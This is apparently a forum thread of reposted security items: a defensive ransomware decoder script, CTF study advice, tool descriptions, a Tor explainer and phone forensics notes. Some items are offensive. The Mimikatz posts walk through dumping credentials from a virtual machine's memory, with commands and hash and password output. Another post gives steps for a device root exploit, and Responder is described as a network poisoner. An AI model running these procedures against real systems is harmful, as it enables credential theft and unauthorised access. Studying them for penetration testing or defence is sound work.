7DD93123078B383EC179C4C381F9119F4EAC4EFB287FE8F538A82E7336DFA4CA

Source: Ransomware infecting user32.dll |
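The rolling-XOR decryptor analysed above, re-implemented as an added example (this is not SurfRight's code nor code from the original post). It reuses only values the disassembly gives: a key starting at 0xAE (BL of 0x6FAAE) that is incremented once per byte, and the call $+5 / add [esp], 0xa / jmp stub of the patched entry point, which it treats as a byte signature; the payloads and the key-recovery helper are constructed for this example.

```python
"""Decoder and two defender-side checks for the user32.dll ransomware
described in the post.  Constants come from the listings in the post;
sample data below is constructed for this example."""
from __future__ import annotations

START_KEY = 0xAE     # BL of "mov ebx, 6FAAEh" in the decryptor
PAYLOAD_LEN = 0x981E  # "mov ecx, 981Eh": number of bytes the loop decrypts

# Bytes of the patched UserClientDllInitialize at 7e41b222..7e41b22b:
#   E8 00 00 00 00   call $+5
#   83 04 24 0A      add [esp], 0xa
#   E9 ..            jmp AlignRects (displacement varies, so not included)
PATCHED_EP_STUB = bytes.fromhex("E800000000" "8304240A" "E9")


def rolling_xor(data: bytes, start_key: int = START_KEY) -> bytes:
    """XOR every byte with a key that starts at start_key and is
    incremented after each byte (only the low byte matters, as BL did).
    XOR is its own inverse, so this both encrypts and decrypts."""
    return bytes(b ^ ((start_key + i) & 0xFF) for i, b in enumerate(data))


def recover_start_key(blob: bytes, known_prefix: bytes) -> int | None:
    """Brute-force the 8-bit starting key when the first plaintext bytes are
    known (constructed helper: the post notes the key is one of the only
    'fixed' values, so a new sample may simply use a different one).
    Returns None if no key reproduces the prefix."""
    head = blob[:len(known_prefix)]
    for key in range(256):
        if rolling_xor(head, key) == known_prefix:
            return key
    return None


def find_patched_entrypoint(image: bytes) -> list[int]:
    """Offsets of every occurrence of the call/add-[esp]/jmp stub in a raw
    file image.  A clean user32.dll should yield an empty list."""
    hits: list[int] = []
    pos = image.find(PATCHED_EP_STUB)
    while pos != -1:
        hits.append(pos)
        pos = image.find(PATCHED_EP_STUB, pos + 1)
    return hits


if __name__ == "__main__":
    # Constructed stand-in for the decrypted stub (not real payload bytes).
    plain = b"\x55\x8b\xec\x83\xec\x08" + b"constructed-stub"
    blob = rolling_xor(plain)                   # what would sit in .rsrc
    assert rolling_xor(blob) == plain           # round trip
    print("recovered start key:", hex(recover_start_key(blob, plain[:4])))

    # Constructed image: clean prologue, then the patched stub, then a jmp target.
    image = b"\x8b\xff\x55\x8b\xec" + PATCHED_EP_STUB + b"\xb0\x22\x05\x00"
    print("patched stub found at offsets:", find_patched_entrypoint(image))
```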
  10. How to Get Started in CTF

by Steve Vittitoe

Over the past two weeks, I’ve examined two different problems from the DEFCON 22 CTF Qualifications: “shitsco” and “nonameyet”. Thank you for all of the comments and questions. The most popular question I received was “How can I get started in CTFs?” It wasn’t so long ago that I was asking myself the same thing, so I wanted to provide some suggestions and resources for those of you interested in pursuing CTFs.

The easiest way to start is to sign up for an introductory CTF like CSAW, Pico CTF, Microcorruption, or any of the other dozens available. Through practice, patience, and dedication, your skills will improve with time. If you’re motivated to take a crack at some of the problems outside of the competition setting, most CTF competitions archive problems somewhere. Challenges tend to have a wide range of difficulty levels as well. Be careful about just picking the easiest problems. Difficulty is subjective based on your individual skillset. If your forte is forensics but you are not skilled in crypto, the point values assigned to the forensics problems will seem inflated while the crypto challenges will seem undervalued to you. The same perception biases hold true for CTF organizers. This is one reason why assessing the difficulty of CTF problems is so challenging.

If you’ve tried several of the basic problems on your own and are still struggling, then there are plenty of self-study opportunities. CTF competitions generally focus on the following skills: reverse engineering, cryptography, ACM style programming, web vulnerabilities, binary exercises, networking, and forensics. Pick one and focus on a single topic as you get started.

1) Reverse Engineering. I highly suggest that you get a copy of IDA Pro. There is a free version available as well as a discounted student license. Try some crack me exercises. Write your own C code and then reverse the compiled versions. Repeat this process while changing compiler options and program logic. How does an “if” statement differ from a “select” in your compiled binary? I suggest you focus on a single architecture initially: x86, x86_64, or ARM. Read the processor manual for whichever one you choose. Book recommendations include:
   - Practical Reverse Engineering
   - Reversing: Secrets of Reverse Engineering
   - The IDA Pro Book

2) Cryptography. While this is not my personal strength, here are some resources to check out:
   - Applied Cryptography
   - Practical Cryptography
   - Cryptography I

3) ACM style programming. Pick a high level language. I recommend Python or Ruby. For Python, read Dive into Python (free) and find a pet project you want to participate in. It is worth noting that Metasploit is written in Ruby. Computer science classes dealing with algorithms and data structures will go a long way in this category as well. Look at past programming challenges from CTF and other competitions – do them! Focus on creating a working solution rather than the fastest or most elegant solution, especially if you are just getting started.

4) Web vulnerabilities. There are many web programming technologies out there. The most popular in CTF tend to be PHP and SQL. The php.net site is a fantastic language reference. Just search any function you are curious about. After PHP, the next most common way to see web challenges presented is with Python or Ruby scripts. Notice the overlap of skills? There is a good book on web vulnerabilities, The Web Application Hacker’s Handbook. Other than that, after learning some of the basic techniques, you might also think about gaining expertise in a few of the more popular free tools available. These are occasionally useful in CTF competitions too. This category also frequently overlaps with cryptography in my experience.

5) Binary exercises. This is my personal favorite. I recommend you go through reverse engineering before jumping into the binary exercises. There are a few common vulnerability types you can learn in isolation: stack overflows, heap overflows, and format string bugs for starters. A lot of this is training your mind to recognize vulnerable patterns. Looking at past vulnerabilities is a great way to pick up these patterns. You should also read through:
   - Hacking: The Art of Exploitation
   - The Shellcoder’s Handbook
   - The Art of Software Security Assessment

6) Forensics/networking. A lot of CTF teams tend to have “the” forensics guy. I am not that guy, but I suggest you learn how to use the 010 hex editor and don’t be afraid to make absurd, wild, random guesses as to what could be going on in some of these problems.

Finally, Dan Guido and company recently put out the CTF field guide, which is a great introduction to several of these topics.

Source: How to Get Started in CTF | Endgame.
  11. Nytro

    httpie

HTTPie: a CLI, cURL-like tool for humans

HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized responses. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.

HTTPie is written in Python, and under the hood it uses the excellent Requests and Pygments libraries.

Table of Contents: Main Features, Installation, Usage, HTTP Method, Request URL, Request Items, JSON, Forms, HTTP Headers, Authentication, Proxies, HTTPS, Output Options, Redirected Input, Terminal Output, Redirected Output, Download Mode, Streamed Responses, Sessions, Config, Scripting, Interface Design, Contribute, Logo, Authors, Licence, Changelog

Main Features
- Expressive and intuitive syntax
- Formatted and colorized terminal output
- Built-in JSON support
- Forms and file uploads
- HTTPS, proxies, and authentication
- Arbitrary request data
- Custom headers
- Persistent sessions
- Wget-like downloads
- Python 2.6, 2.7 and 3.x support
- Linux, Mac OS X and Windows support
- Documentation
- Test coverage

Source: https://github.com/jakubroztocil/httpie
  12. Nytro

    termcoin

A bitcoin wallet and blockchain explorer for your terminal.

termcoin bitcoin wallet and blockchain explorer for your terminal, written for node.js

termcoin's UI is rendered by blessed which is a full ncurses replacement and high-level widget library. Expect mouse support, eye-candy hover effects, and so-on.

termcoin's bitcoin implementation is now based on BCoin which fully implements BIP-37's description of bloom filters. This basically means you don't have to download the entire blockchain to use your wallet. You ask for and store only the transactions relevant to you (broadcasted in your bloom filter), while at the same time being able to verify the merkleroot of blocks.

The blockchain explorer currently uses the blockchain.info json api as a backend. In the future, termcoin will leave an option for the user to download the entire blockchain in the background (using bcoin - out of sheer obsession, I implemented the original satoshi protocol in bcoin), which means you will be able to explore the blockchain on your local disk instead of waiting for api calls to return.

For data management, termcoin uses tiny as the database necessary to store the (small) blockchain data and transactions relevant to your account.

BCoin was conceived brilliantly, and Fedor Indutny also went to the trouble of writing an ecdsa and bignumber library in pure javascript to supplement BCoin. With all this being said, it's worth pointing out that termcoin is written entirely in pure javascript. All of this means:

- No compiling a database binding
- No compiling a binding to an ecdsa library
- No linking to ncurses
- No running a bitcoin rpc server in the background
- No downloading a 20gb blockchain

Just use your wallet and enjoy!

Termcoin uses a basic JSON wallet format with private keys that are compatible with bitcoind's importprivkey/dumpprivkey (128-prefixed+checksummed+base58) keys. (It also supports AES-CBC encryption for your private keys, just like the official bitcoin client).

NOTE: Termcoin used to use bitcoind/litecoind/etc as a backend. This backend is still supported for other currencies. It's just not as featureful due to limitations in the [coin]d rpc server.

Screenshots

Source: https://github.com/chjj/termcoin
  13. Tor Is For Everyone: Why You Should Use Tor

EFF recently kicked off our second Tor Challenge, an initiative to strengthen the Tor network for online anonymity and improve one of the best free privacy tools in existence. The campaign—which we've launched with partners at the Freedom of the Press Foundation, the Tor Project, and the Free Software Foundation—is already off to a great start. In just the first few days, we've seen over 600 new or expanded Tor nodes—more than during the entire first Tor Challenge.

This is great news, but how does it affect you? To understand that, we have to dig into what Tor actually is, and what people can do to support it. Support can come in many forms, too. Even just using Tor is one of the best and easiest things a person can do to preserve privacy and anonymity on the Internet.

What is Tor?

Tor is a network and a software package that helps you anonymously use the Internet. Specifically, Tor hides the source and destination of your Internet traffic; this prevents anyone from knowing both who you are and what you are looking at (though they may know one or the other). Tor also hides the destination of your traffic, which can circumvent some forms of censorship. Tor has been in development for many years and is very stable and mature. It is regarded as one of the best privacy tools currently in existence and it does not cost you anything.

How does Tor help me?

This graphic shows how Tor and https can work together to protect your privacy on the Internet.

Basically, Tor encrypts the data you send across the Internet in multiple layers, like an onion. Then it sends that data through multiple relays, each one of which peels a layer off the onion until your packet leaves the final relay and gets to its destination. This is called 'onion routing' and it is a fantastic method for keeping privacy on the web. Proper use of Tor—along with HTTPS Everywhere—can be one of the best ways to ensure your browsing will remain anonymous.

But I don't need privacy, I have nothing to hide!

Everyone needs privacy sometimes! For example: perhaps you end up with an embarrassing medical condition and you want to search for information about it but you don't want Google and every advertiser to know about your bodily functions. Tor can help you keep that information private.

Tor can also help prevent online tracking more generally as well. Proper use of Tor can circumvent most third party trackers that governments and corporations can use to track your browsing habits and send you obnoxious intrusive advertisements. Tor can also protect your data from hackers on your network.

Tor can also help you get around censorship and firewalls from the filter at your school or office or even help you circumvent firewalls or censorship put in place by your government.

How do I use Tor?

The easiest way to get up and running with Tor is to use the Tor Browser Bundle. It is a version of Firefox that comes preconfigured to use Tor. Tor Browser Bundle is set up to use Tor the right way so that you will avoid a lot of the common pitfalls that can pierce your veil of anonymity.

If you prefer a more holistic approach or wish to use Tor for something other than just web browsing, you can use Tails. Tails is an operating system that runs off of a live CD. It is configured so that all Internet connections run through Tor; and when you are done, everything that you did is wiped clean from your computer's memory. It never touches your hard drive and leaves no traces on your computer.

If you want to use Tor on your Android phone, check out Orbot; it can run your browsing and other programs through Tor.

Tor sounds great. What can I do to help?

To help make Tor faster and more secure one of the best things you can do is set up a Tor relay. That's what we're asking people to do in our Tor Challenge. The more relays there are in the Tor network the more speed and security Tor has. Setting up a relay may also improve your own personal anonymity.

But even just using Tor increases the anonymity of all the other users. There's some safety in numbers: if the only people using Tor are those who have a serious need for it then any use of Tor is suspicious. But if Tor gets used for everything from pizza orders to looking at funny cat photos then it is much less so.

So if I use Tor will I have perfect anonymity all of the time?

Nothing is foolproof, not even Tor. If you use Tor the wrong way you can end up destroying your own anonymity. If you use Tor to log into Facebook or Gmail, for example, they may not know where you are coming from but they will certainly know who you are and they may even be able to track your browsing around the web. The Tor Project has posted a list of common mistakes that inexperienced users sometimes make.

When used properly Tor is one of the best tools for internet privacy that exists. You can use it to circumvent firewalls in an oppressive country, retain your privacy, or browse the Internet while at school. Setting up and running Tor is easy and it is one of the best things any citizen of the Internet can do to help keep a free and open Internet. And if you can run a Tor relay, or want to commit to boosting the bandwidth on a relay you already run, you can take part in our Tor Challenge and push us over our target while collecting prizes. Check out the Tor Challenge today.

Source: https://www.eff.org/deeplinks/2014/06/why-you-should-use-tor
  14. Blackberry Forensics

1.0. UNLOCKED BLACKBERRY DEVICES

Unlocked BlackBerry device with no password

Situation
• BB contains memory card and SIM.
• Which type of data extraction should be performed and in what order?
• Physical, File System, then Logical?

Examiner Considerations:
• There are a variety of tools available to the examiner.
• Start Physical, if supported, then move to File System and Logical.
• Wear Leveling
• A data structure at the logical level, in the form of a logical backup/acquisition, is different than the same record at the physical level.
• ** In rare cases performing a physical with UFED may cause device to reset itself to factory default.
• This is referred to by Cellebrite as “cache memory reset”.

Download: https://digital-forensics.sans.org/summit-archives/dfir14/BlackBerry_Forensic_Nuggets_Shafik_Punja_and_Cindy_Murphy.pdf
  15. DNS Sinkhole This paper describes the architecture and configuration of a complete Domain Name Services (DNS) sinkhole system based on open-source software. The DNS sinkhole can be used to provide detection and prevention of malicious and unwanted activity occurring between organization computer systems and the Internet. The system is inexpensive, effective, scalable and easy to maintain. Download: https://www.sans.org/reading-room/whitepapers/dns/dns-sinkhole-33523
  16. Reverse Engineering Malicious Javascript Jose Nazario, Ph.D. <jose@arbor.net> Bad guys want to get malware on your box. They don’t want your security systems to detect their known exploits. So they obfuscate them. By the end of this talk you’ll be armed with techniques to defeat their techniques. Download: https://cansecwest.com/csw07/csw07-nazario.pdf
  17. Mimikatz Against Virtual Machine Memory Part 2

Short update to talk about mostly performing the actions from Part 1 on Windows 8+ and Windows Server 2012.

First issue was symbols in windbg. Most importantly, NO symbols for windbg. I found this article that lets you remotely download them: Use the Microsoft Symbol Server to obtain debug symbol files

    .sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols

    0: kd> .sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols
    Symbol search path is: SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols
    Expanded Symbol search path is: srv*f:\localsymbols*http://msdl.microsoft.com/download/symbols
    0: kd> .reload
    Loading Kernel Symbols
    ...............................................................
    ................................................................
    ..............
    Loading User Symbols
    Loading unloaded module list
    .........

Second issue was creating the dmp file. I tried volatility's imagecopy and The Windows Memory Toolkit. Neither produced a dump file that would work with windbg for Windows 8 or Windows 2012. What did work was VMWare's vmss2core utility.

Note for VMware workstation/fusion you need to pass it the .vmsn and .vmem files (shown above). For VMware ESXi I just needed to pass the .vmsn file.

The rest follows the same flow as the previous post:

1. Load the memory.dmp file vmss2core created

2. Fix your symbols (shown above)

3. Load the mimilib.dll file

    kd> .load C:\users\user\desktop\mimilib.dll

4. Find the lsass process

    kd> !process 0 0 lsass.exe
    PROCESS ffffe00112f08080
        SessionId: 0  Cid: 01e8    Peb: 7ff623aac000  ParentCid: 0194
        DirBase: 06291000  ObjectTable: ffffc001f8f0c400  HandleCount:
        Image: lsass.exe

5. Switch to that process

    kd> .process /r /p ffffe00112f08080
    Implicit process is now ffffe001`12f08080
    Loading User Symbols
    ................................................................

6. Run Mimikatz

    kd> !mimikatz

7. Drink Beers

Posted by CG at 11:45 AM

Source: Carnal0wnage & Attack Research Blog: Mimikatz Against Virtual Machine Memory Part 2
  18. Mimikatz Against Virtual Machine Memory Part 1

Pentesting is a funny thing. Someone will drop some new way of doing something and then you get to reflect on all those missed opportunities on previous engagements. I remember when MC showed me all the Oracle stuff and I reminisced about the missed shells. This post and part 2 is like that for me.

I can't count the number of times I've had access to the folder full of an organization's virtual machines. I knew you could download the raw disk (vmdk) and use tools like volatility on them to carve out useful pieces of the file system but not memory.

While doing some research on vCenter/ESXi I came across a couple of blog posts on the subject:

- Extract Windows passwords from VMware .vmem file
- WinDbg et l’extension de mimikatz | Blog de Gentil Kiwi
- Password dump from a Hyper-V Virtual Machine´s memory | vNiklas Virtualization blog

This of course sent me down the rabbit hole to see if I could do it. Remko's post mentions you need a few things:

- The Windows debugging tools: Debugging Tools for Windows Direct Download - Remko Weijnen's Blog (Remko's Blog); WinDBG | Blog de Gentil Kiwi
- The Windows Memory Toolkit: MoonSols Windows Memory Toolkit | MoonSols
- Current mimikatz that supports the windbg magic: https://github.com/gentilkiwi/mimikatz

Gotcha #1: The free version of Windows Memory Toolkit limits OS and architecture you can do this on. Restrictions are 32bit up to Windows Server 2008.

The process:

#1 Copy the vmem/vmsn from the remote host

#2 Use moonsols bin2dmp to convert it into a dmp file. (I'm using the for pay version below)

    C:\Users\user\Desktop>Bin2Dmp.exe "Windows Server 2008 x64-b2afd86a.vmem" win2k8.dmp
    bin2dmp - v2.1.0.20140115
    Convert raw memory dump images into Microsoft crash dump files.
    Copyright (C) 2007 - 2014, Matthieu Suiche
    Copyright (C) 2012 - 2014, MoonSols Limited

    Initializing memory descriptors... Done.
    Directory Table Base is 0x124000
    Looking for Kernel Base...
    Looking for kernel variables... Done.
    Loading file... Done.
    nt!KiProcessorBlock.Prcb.Context = 0xFFFFF80001B797A0
    stuff happens
    [0x0000000040000000 of 0x0000000040000000] [0x000000001DAFE000 of 0x000000
    MD5 = E8C2F318FA528285281C21B3141E7C51
    Total time for the conversion: 0 minutes 14 seconds.

you should now have a .dmp file you can load into windbg

#3 Load the dmp file into windbg

Gotcha #2: You may have to run .symfix and .reload

    kd> .symfix
    kd> .reload
    Loading Kernel Symbols
    ...............................................................
    ................................................................
    .....
    Loading User Symbols
    Loading unloaded module list
    ....

#4 Load the mimilib.dll file

    kd> .load C:\users\user\desktop\mimilib.dll

      .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (May 25 2014 21:48:13)
     .## ^ ##.  Windows build 6002
     ## / \ ##  /* * *
     ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
     '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
      '#####'    WinDBG extension !                              * * */

    ===================================
    #        * Kernel mode *          #
    ===================================
    # Search for LSASS process
    0: kd> !process 0 0 lsass.exe
    # Then switch to its context
    0: kd> .process /r /p <EPROCESS address>
    # And finally :
    0: kd> !mimikatz
    ===================================
    #         * User mode *           #
    ===================================
    0:000> !mimikatz
    ===================================

The tool output will walk you through the rest

#5 Find the lsass process

    kd> !process 0 0 lsass.exe
    PROCESS fffffa800dba26d0
        SessionId: 0  Cid: 023c    Peb: 7fffffd4000  ParentCid: 01e4
        DirBase: 2e89f000  ObjectTable: fffff880056562c0  HandleCount: 1092.
        Image: lsass.exe

#6 switch to the lsass context (fffffa800dba26d0 in this case)

    kd> .process /r /p fffffa800dba26d0
    Implicit process is now fffffa80`0dba26d0
    Loading User Symbols
    ................................................................
    ......................

#7 Load mimikatz

    kd> !mimikatz

    Authentication Id : 0 ; 996 (00000000:000003e4)
    Session           : Service from 0
    User Name         : WIN-3C4WXGGN8QE$
    Domain            : UNLUCKYCOMPANY
    SID               : S-1-5-20
            msv :
             [00000002] Primary
             * Username : WIN-3C4WXGGN8QE$
             * Domain   : UNLUCKYCOMPANY
             * NTLM     : ea2ed0b14406a168791adf5aee78fd0b
             * SHA1     : ab7bd2f6a64cf857c9d69dd65916622e3dc25424
            tspkg : KO
    ---SNIP---
    Authentication Id : 0 ; 173319 (00000000:0002a507)
    Session           : Interactive from 1
    User Name         : Administrator
    Domain            : UNLUCKYCOMPANY
    SID               : S-1-5-21-2086621178-2413078777-1398328459-500
            msv :
             [00000002] Primary
             * Username : Administrator
             * Domain   : UNLUCKYCOMPANY
             * LM       : e52cac67419a9a2238f10713b629b565
             * NTLM     : 64f12cddaa88057e06a81b54e73b949b
             * SHA1     : cba4e545b7ec918129725154b29f055e4cd5aea8
            tspkg :
             * Username : Administrator
             * Domain   : UNLUCKYCOMPANY
             * Password : Password1
            wdigest :
             * Username : Administrator
             * Domain   : UNLUCKYCOMPANY
             * Password : Password1
            kerberos :
             * Username : Administrator
             * Domain   : UNLUCKYCOMPANY.NET
             * Password : Password1
             * Key List
    ---SNIP---

There were a few other gotchas for Windows 8 and Windows 2012. I'll put that in part 2.

CG

Posted by CG at 12:37 PM

Source: Carnal0wnage & Attack Research Blog: Mimikatz Against Virtual Machine Memory Part 1
  19. Z2 Root Exploit

Hey guys, this is a cross-post of sorts. I just got root execution on my stock Z2 Tablet and it appears that the same method should work for Z2 phone. I have a Z2 phone but just haven't tested it on that one yet.

Here is my Linux script to grab the TA partition from Z2: https://mega.co.nz/#!bVYx2I4S!x-9qkv...VfbiAd0jEDDgWY [update, v4]

DooMLoRD's Windows version: http://doomlord.xperia-files.com/dow...Y0X1dJTkRPV1M=

Requirements:
1. Be on an early Z2 phone/tablet firmware. .69 is confirmed working, .402 is confirmed patched
2. Use Linux or something that has 'bash'

Instructions:
1. Extract exploit.tar.gz and run ./root1.sh
2. Crash the system menu that appears by doing System Info -> Configuration or similar.
3. Run ./root2.sh
4. Repeat Step #2
5. Your TA.img should now be in /data/local/tmp. Use adb pull /data/local/tmp/TA.img to retrieve it.

Tell me if it works or if you get any errors. Thanks.

Source: Z2 Root Exploit - xda-developers
  20. Low level PC attack papers

BIOS/Firmware:
- Attacking Intel BIOS
- BootKit: eEye BootRoot
- Bootkit: Deep Boot
...

Source: A Timeline made with Timeglider, web-based timeline software
  21. Responder

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

INTRODUCTION

This tool is first an LLMNR, NBT-NS and MDNS responder; it will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: NetBIOS Suffixes (16th Character of the NetBIOS Name)). By default, the tool will only answer to File Server Service request, which is for SMB. The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option via command line if you want this tool to answer to the Workstation Service request name suffix.

Source: https://github.com/Spiderlabs/Responder
  22. Translate regular Assembly into Extended Instructions

SSEXY - Convert x86 instructions into their SSE equivalents. For more information, read the slides and summary which can be found here: http://jbremer.org/ssexy.zip

Source: https://github.com/jbremer/ssexy
  23. [h=3]Monkeying around with Windows Phone 8.0[/h]

[Figure: Ah, the wonders of Windows Phone 8.0 ... Failing eyesight, Frustration and Squirrel chasing]

Currently, there is not much freely available documentation on how Windows Phone 8.0 stores data, so it is hoped that the information provided in this post can be used as a stepping stone for further research / possible scripting. Hopefully, analysts will also be able to use this post to help validate any future tool results.

Special Thanks to Detective Cindy Murphy (@CindyMurph), Lieutenant Jennifer Krueger Favour (@rednogn) and the Madison Police Department ("Forensicate Like A Champion!") for providing the opportunity and encouragement for this research.

Unfortunately, due to time constraints and a limited test data set, I wasn't able to write an all-singing/all-dancing script. Instead, some one-off scripts were created to extract/sort the relevant data a lot quicker than it would have taken to do manually. Rather than releasing scripts that are customized for a limited set of test data (which I don't have easy access to any more), this post will be limited to documenting the data sources/structures.

OK, so no free tool and you're still here reading huh? In Yoda voice: "The nerd runs strong in this one"

Thanks to Maggie Gaffney from Massachusetts State Patrol / Teel Technologies, the initial test data (.bin file) was sourced via JTAG from a Nokia 520 Windows 8.0 phone - a "cheap" smart phone common to prepaid plans. The .bin file was then opened in X-Ways Forensics to parse the 28(!) file system partitions and to export out files of interest. The exported files were then viewed in hex view using Cellebrite Physical Analyzer (love the data interpretation and colour coded bookmarking!).

Later, we were also able to get our paws on some test data from a HTC PM23300 Windows Phone 8.0 phone courtesy of JoAnn Gibb from the Ohio Attorney General's Office. It's awesome knowing people that know people!

Note: The Nokia 520 does not display the full SMS timestamp info (threaded messages display date only). So while we can potentially re-create the order of threaded messages as per the test phone, we can't easily validate the exact time an SMS message was sent/received. There's a good chance that other Windows Phone 8.0 phones will use the same timestamp mechanism and hopefully they will display the full timestamp.

[h=3]So where's the data?![/h]

The SMS content, MMS file attachment info and Contacts information are stored (via the 28th Partition) in:
\Users\WPCOMMSSERVICES\APPDATA\Local\Unistore\store.vol

Various .dat files containing MMS content are also stored in sub-directories of:
\SharedData\Comms\Unistore\data

The Call log is stored in:
\Users\WPCOMMSSERVICES\APPDATA\Local\UserData\Phone

The "store.vol" and "Phone" files seem to be ESE Databases (see explanations here and here) with the magic number of "xEF xCD xAB x89" present at bytes 4-8. Consequently, we tried opening "store.vol" using Nirsoft's ESE Database viewer but had limited success - the SMS message texts were not viewable, however other data was. This suggests that maybe the "store.vol" file differs in some way from the ESE specification and/or the tool had issues reading the file. Joachim Metz has also both documented (here and here) and written a C library "libesedb" to extract ESE databases. Unfortunately, I didn't discover Joachim's library until after we started poking around ..

Anyway, it was a pretty masochistic interesting exercise trying to reverse engineer the "store.vol" file. One possible benefit of this data diving is that it *might* also reveal unallocated/partially overwritten data records that might be ignored by libraries which read the amount of data declared (vs reading all the data present). This is pure speculation though as I don't know if old records are overwritten or just marked as invalid.

Viewing "store.vol" using Cellebrite Physical Analyzer, relevant data was observed for text strings (eg phone numbers, SMS text strings) encoded in UTF-16 LE throughout the file. As a database file there will be tables. Each table will have columns of values (eg time, text content, flags). A single (table row) record will thus have data stored for each column. Table data will be organized within the file somehow (eg multiple SMS records organized into page blocks). So it is likely that finding a hit for a specific SMS will lead you to the contents of other SMS messages (potentially around the same timeframe).

The Nokia 520 was actually locked with a 4 digit PIN when we started investigating. Without access to the phone, any manual inspection/validation would have been impossible. It was unknown if the phone would have been wiped if too many incorrect PINs were entered. So any guesses would have to be documented and carefully chosen. It wasn't looking good ... until a combination of thinking outside the box and a touch of luck led us to an SMS text message (in "store.vol") with the required 4 digit code. Open sesame!

[h=3]Some things we tried with the data ...[/h]

To find specific SMS records we searched for unique/known strings from the SMS text (eg "Look! A Squirrel!"). A single record was found per SMS in "store.vol" and each record also contained a UTF-16-LE string set to "SMStext".

To find contact information, we searched for known phone number strings (eg +16085551234, 123456, 1234). Some numbers were observed in "store.vol" in close proximity to "SMStext" strings while other instances were located close to what appeared to be contact information (eg contact names).

To search for field markers and flags, we compared separate SMS text records and looked for patterns/commonalities in the hex. Sometimes the pattern was obvious (eg "SMStext" occurs in each SMS message) and sometimes it wasn't so obvious (sometimes there is no discernible pattern!).

Figuring out the timestamp format being used was HUGE. Without it, we could not have figured out the order messages were sent/received. Using Cellebrite Physical Analyzer to view the "store.vol" hex, Eagle-eyed Cindy noticed that there were 8 byte groupings occurring before/after the SMS text content. These 8 bytes were usually around the same value range (eg in LE xFF03D2315FE1C701). Which is what you'd expect within a single message. Subsequent messages usually had larger values - which corresponds to messages sent/received at a later time.

Like most hex viewers, Cellebrite Physical Analyzer can interpret a predefined number of bytes from the current cursor position and print a human friendly version. Using this, Calculon Cindy showed an otherwise oblivious monkey that these 8 byte groupings could be interpreted as MS FILETIME timestamps! To be honest, I was expecting smaller 4 byte timestamps - Silly monkey!

By comparing the 8 byte values surrounding a specific SMS text message (eg "Look! A Squirrel!") with the date displayed on the phone for that message, we theorized that our mysterious timestamps were *probably* MS FILETIME timestamps (No. of 100 ns increments since 1 January 1601 in UTC). For example, xFF03D2315FE1C701 = Sat, 18 August 2007 06:15:37 UTC. As the phone did not display the exact time for each SMS, we could only use the order of threaded messages and the date displayed to somewhat confirm our theory. Various SMS sent/received dates on the phone were spot checked against a corresponding "store.vol" entry timestamp date and the date values consistently matched.

[h=3]What the data looks like[/h]

After some hex ray vision induced cross-eyedness (who knew that looking at hex is almost like a curse!), we think we've figured out some general data structures for SMS, MMS, Contacts and Call log records. There's still some unknowns/grey areas but it's a start.

- On the data structure diagrams below, "?" is used to denote a varying/unknown number of bytes.
- FILETIMEs are LE 8 byte integers representing the number of 100 ns intervals since 1 JAN 1601.
- In general, strings are null terminated and UTF-16-LE encoded (ie 2 bytes per character).

[h=4]Sent / Received SMS records[/h]

There are two types of SMS data structures which are mixed together. Each type of SMS structure contains a UTF-16-LE encoded string for "SMStext". However, one type contains phone number strings and the other does not. For later ease of understanding, we'll say these "SMStext" records occur in "Area 1". Initially, monkey was confused about why some SMS records had phone numbers and some didn't. However, by inspecting the unlocked phone, we were able to confirm that the SMS message records with no number corresponded to sent SMS.

[Figure: Sent "SMStext" record (from Area 1 in "store.vol")]

Note 1: Note the lack of Phone number information. From test data, FILETIME values (in red and pink) seemed a little inconsistent. Sometimes FILETIMEs within the same record matched each other and other times they varied by seconds/minutes.
Note 2: The Sent Text string (in yellow) is null terminated and encoded in UTF-16-LE.

[Figure: Received "SMStext" record (from Area 1 in "store.vol")]

Note 1: Received SMS have multiple source phone number strings listed (in orange). These seem to remain constant within a given record (eg PHONE1 = PHONE2 = PHONE3).
Note 2: Similar to Sent "SMStext" records, the FILETIMEs (in red and pink) within a record might/might not vary.
Note 3: The Received Text string (in yellow) is null terminated and encoded in UTF-16-LE.

To find out the destination phone number for a sent SMS we can make use of the factoid observed by searching "store.vol" for the FILETIMEs from a specific Sent "SMStext" record. It appears that FILETIMEs 1, 3 & 4 (in pink) from a given Sent "SMStext" record usually occur once in the entire "store.vol". The FILETIME2 value (in red) however, also appears in a second area ("Area 2"). This area has a bunch of different looking data records each containing the null terminated UTF-16-LE encoded string for "SMS". Also contained in each data record is a phone number string.

The "Area 2" SMS records look like:

[Figure: "SMS" record (from Area 2 in "store.vol")]

Note 1: Each "SMS" record contains a UTF-16-LE encoded string for "SMS".
Note 2: From both sets of test data, there seems to be a consistent number of bytes between:
- The FILETIMEX (in red) and "SMS" string (in kermit green) and
- The "SMS" string (in kermit green) and the Phone number string (in orange).

So, each sent "SMStext" FILETIME2 value (from Area 1) should have a corresponding match with an "SMS" record's FILETIMEX value (in Area 2). In this way, we can match a sent "SMStext" message with the destination phone number via the FILETIME2 value. Sounds a little crazy right? But the test data seems to confirm this. Purrr!

[h=4]Contacts[/h]

Contact information is also located in "store.vol". There were 2 observed data structure types - both contained phone number and name information; however, one data type had an extra 10 digit number string. It was later discovered via phone inspection that the records with the extra 10 digit strings corresponded with "Hotmail" address book entries. It would be interesting to see if the 10 digit number corresponded to a unique hotmail user ID of some kind. The second type of contacts structure was a "Phonebook" entry - presumably these contact types were entered into the phone by the user rather than slurped up from a Hotmail account. Common to both contact records were multiple occurrences of the same contact name and phone number. OCD phonebook, OCD phonebook, OCD phone book ...

[Figure: "Hotmail" Contacts record (from "store.vol")]

[Figure: "Phonebook" Contacts record (from "store.vol")]

Note 1: The flag value (in red) which can be used to determine if the contact record is a "Hotmail" or "Phonebook" entry.
